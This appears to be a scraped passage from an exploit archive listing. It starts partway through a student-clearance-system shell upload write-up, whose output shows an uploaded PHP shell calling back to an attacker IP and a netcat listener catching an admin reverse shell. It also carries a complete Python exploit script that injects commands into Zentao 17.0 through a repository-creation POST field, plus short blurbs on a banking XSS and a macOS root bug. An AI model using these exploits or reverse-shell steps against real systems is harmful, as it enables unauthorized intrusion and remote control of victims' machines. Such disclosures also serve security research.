Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm

======================================== 
End of Request 
========================================

Response: 
=========

HTTP/1.1 200 OK 
Date: Sat, 08 Oct 2022 09:32:16 GMT 
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 
X-Powered-By: PHP/7.4.30 
Content-Length: 268 
Connection: close 
Content-Type: text/plain;charset=UTF-8

 
Notice: Undefined variable: res in 
C:\xampp\htdocs\student_clearance_system_Aurthur_Javis\student_clearance_system_Aurthur_Javis\uploads\shell.php 
on line 12 
Using dir : C:\windows\temp

Executing : D3fa1t_shell.exe 80 192.168.1.26

======================================== 
End of Response 
========================================

After uploading the reverse shell file you will get the reverse shell 
normally. If you don't get reverse shell then locate to 'uploads' folder.

Reverse Shell Remotely: 
======================

┌──(kali㉿kali)-[~] 
└─$ rlwrap nc -lvnp 80 
listening on [any] 80 ... 
connect to [192.168.1.26] from (UNKNOWN) [192.168.1.12] 65168 
b374k shell : connected

Microsoft Windows [Version 10.0.19043.2006] 
(c) Microsoft Corporation. All rights reserved.

whoami 
whoami 
l3v1ath0n\admin

C:\Windows\Temp>

Web Based Student Clearance 1.0 Shell Upload

During a penetration test of an Electronic Banking Internet Communication Standard (EBICS) environment, Pentagrid observed a cross site scripting vulnerability in the EBICS banking implementation developed by CREALOGIX AG and used by many banks.

Crealogix EBICS Cross Site Scripting

Zentao Project Management System version 17.0 suffers from an authenticated remote code execution vulnerability.

# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution# Exploit Author: mister0xf # Date: 2022-10-8# Software Link: https://github.com/easysoft/zentaopms# Version: tested on 17.0 (probably works also on newer/older versions)# Tested On: Kali Linux 2022.2# Exploit Tested Using: Python 3.10.4# Vulnerability Description:# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing # remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver # Vulnerable Source Code:# /module/repo/model.php:# [...]# $client = $this->post->client; // <-- client is taken from the POST request# [...]# elseif($scm == 'Git')# {# if(!is_dir($path))# {# dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);# return false;# }## if(!chdir($path))# {# if(!is_executable($path))# {# dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);# return false;# }# dao::$errors['path'] = $this->lang->repo->error->path;# return false;# }## $command = "$client tag 2>&1"; // <-- command is injected here# exec($command, $output, $result);import requests,sysimport hashlibfrom urllib.parse import urlparsefrom bs4 import BeautifulSoupdef banner(): print(''' ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+########## ########## ### #### ######## ########### ### ### ######## ''')def usage(): print('Usage: zenciao user password http://127.0.0.1/path') def main(): if ((len(sys.argv)-1) != 3): usage() banner() exit() #proxy = {'http':'http://127.0.0.1:8080'} banner() username = sys.argv[1] password = sys.argv[2] target = sys.argv[3] # initialize session object session = requests.session() home_url = target+'/index.php' rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' login_url = target+'/index.php?m=user&f=login&t=html' create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' r1 = session.get(home_url) soup = BeautifulSoup(r1.text, "html.parser") script_tag = soup.find('script') redirect_url = script_tag.string.split("'")[1] r2 = session.get(target+redirect_url) # get random value session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) res = session.get(rand_url) rand = res.text # compute md5(md5(password)+rand) md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) # login request post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html' session.headers.update({'Referer': my_referer}) session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) response = session.post(login_url, data=post_data) # exploit rce # devops repo page r2 = session.get(create_repo_url) git_test_dir = '/home/' command = 'whoami;' exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} r3 = session.post(create_repo_url, data=exploit_post_data) print(r3.content)if __name__ == '__main__': main()

Zentao Project Management System 17.0 Remote Code Execution

This is a write up demonstrating how to get root on macOS 12.3.1 using CoreTrust and DriverKit bugs. Included is the spawn_root proof of concept.

Source

Packet Storm